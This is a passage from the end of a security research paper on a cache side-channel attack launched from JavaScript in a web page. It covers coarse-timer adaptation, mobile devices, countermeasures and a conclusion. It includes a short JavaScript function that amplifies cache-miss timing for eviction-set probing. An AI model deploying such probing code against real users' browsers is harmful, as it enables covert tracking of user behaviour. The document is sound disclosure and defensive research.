Since, as Figure 3 shows, the difference between a single cache hit and a single cache miss is only about 50 nanoseconds, the profiling and measurement scripts need to be modified slightly on systems with coarser timer resolution. In the profiling phase, instead of timing a single cache miss, we perform repeated memory accesses to amplify the timing difference. In the measurement phase we cannot amplify the time of each individual cache miss, but we can exploit the fact that code from the same page frame usually invalidates adjacent cache sets: as long as 20 of the 64 cache sets in a page frame produce cache misses, our attack can be carried out even at millisecond resolution.
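A sketch of the amplification idea for the profiling phase follows (ours; evictionSet and x are byte offsets as in Section 2.1, and the result is compared against a baseline measured with a non-conflicting set):

```javascript
// Amplify the hit/miss difference for coarse timers: a single miss (~50 ns) is
// below a 1-microsecond timer's resolution, so we time many rounds of
// "sweep the candidate eviction set, then access x". If the set conflicts with
// x, each round adds roughly one extra miss, and the accumulated difference
// rises above the timer's resolution.
function amplifiedProbe(view, evictionSet, x, rounds) {
  var t0 = performance.now();
  for (var r = 0; r < rounds; r++) {
    for (var i = 0; i < evictionSet.length; i++) {
      view.getUint32(evictionSet[i]);        // evict x if the set conflicts
    }
    view.getUint32(x);                       // hit or miss depending on above
  }
  return performance.now() - t0;
}
```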
The attack we propose can also be applied readily to mobile devices such as phones and tablets. Notably, the Android Browser has supported the High Resolution Time API and typed arrays since version 4.4, while Safari on iOS (8.1) did not support the High Resolution Time API at the time of writing.
### 5.2 Countermeasures

The attack described in this article is possible because of a combination of design decisions ranging from the micro-architecture all the way up to the JavaScript runtime: the mapping of physical memory addresses to cache sets, the inclusive cache hierarchy, JavaScript's fast memory access and high-resolution timer, and finally the JavaScript permission model. Mitigations are possible at each of these points, but each comes at a cost to the normal use of the system.
At the micro-architectural level, changing the mapping from physical memory to cache lines, so that 6 of the lowest 12 address bits are no longer used directly to select a cache set, would effectively prevent our attack. Likewise, switching from an inclusive to a non-inclusive cache micro-architecture would make it nearly impossible for our code to evict entries from the L1 cache, making the measurements far more difficult. However, both design decisions were made to keep the CPU design and cache usage efficient, and changing them would hurt the performance of many other applications. Moreover, modifying the CPU micro-architecture is no small matter, and hardware that is already deployed certainly cannot be upgraded.
At the JavaScript level, lowering the resolution of the high-resolution timer would make the attack harder to mount. However, high-resolution timers were introduced to meet real needs of JavaScript developers, ranging from music and games to augmented reality and telemedicine.
One possible stopgap is to restrict access to the timer to applications that have obtained the user's permission (for example, via a confirmation dialog) or third-party approval (for example, by being downloaded from a trusted "app store").
An interesting approach would be to detect and block such attacks using heuristic profiling. For example, just as Wang et al. used the abundance of arithmetic and bitwise instructions to detect the presence of cryptographic primitives [21], one could notice that the various measurement steps of our attack access memory in characteristic patterns. Since modern JavaScript runtimes already inspect the runtime behavior of code in detail as part of profile-guided optimization, the runtime could recognize profiling-like behavior during execution and respond accordingly (for example, by adding jitter to the high-resolution timer or dynamically relocating arrays in memory).
### 5.3 Conclusion

In this paper we showed how a micro-architectural side-channel attack, a class of attack already recognized as highly effective, can be launched from an untrusted web page. In contrast to the cryptanalytic applications for which cache attacks are usually used, we showed how the attack can be used to effectively track user behavior. This expanded reach of side-channel attacks means that countermeasures against them must be considered when designing any new secure system.
## Acknowledgments
We thank Henry Wong for his investigation of the Ivy Bridge cache replacement policy, and Burton Rosenberg for his explanation of pages and page frames.